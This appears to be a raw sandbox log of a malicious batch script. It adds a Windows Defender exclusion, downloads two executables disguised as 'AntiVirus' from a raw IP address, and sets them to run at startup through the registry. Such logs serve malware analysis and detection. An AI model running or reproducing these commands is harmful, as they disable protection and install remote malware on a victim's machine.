cmd.exe "C:\Windows\System32\cmd.exe" /c start /wait "RiyJ" C:\Users\test22\AppData\Local\Temp\lamda.cmd
3028powershell.exe powershell -Command "New-Item -ItemType Directory -Force -Path 'C:\RM'"
2220powershell.exe powershell -Command "Add-MpPreference -ExclusionPath 'C:\RM'"
2456powershell.exe powershell -Command "Invoke-WebRequest 'http://85.209.133.18/LgGFdDAm/AntiVirus.exe' -OutFile 'C:\RM\AntiVirus.exe'"
2532powershell.exe powershell -Command "Invoke-WebRequest 'http://85.209.133.18/LgGFdDAm/AntiVirus2.exe' -OutFile 'C:\RM\AntiVirus2.exe'"
1844reg.exe reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v "MainProgram1" /t REG_SZ /d "C:\RM\AntiVirus.exe" /f
2432reg.exe reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v "MainProgram2" /t REG_SZ /d "C:\RM\AntiVirus2.exe" /f
1592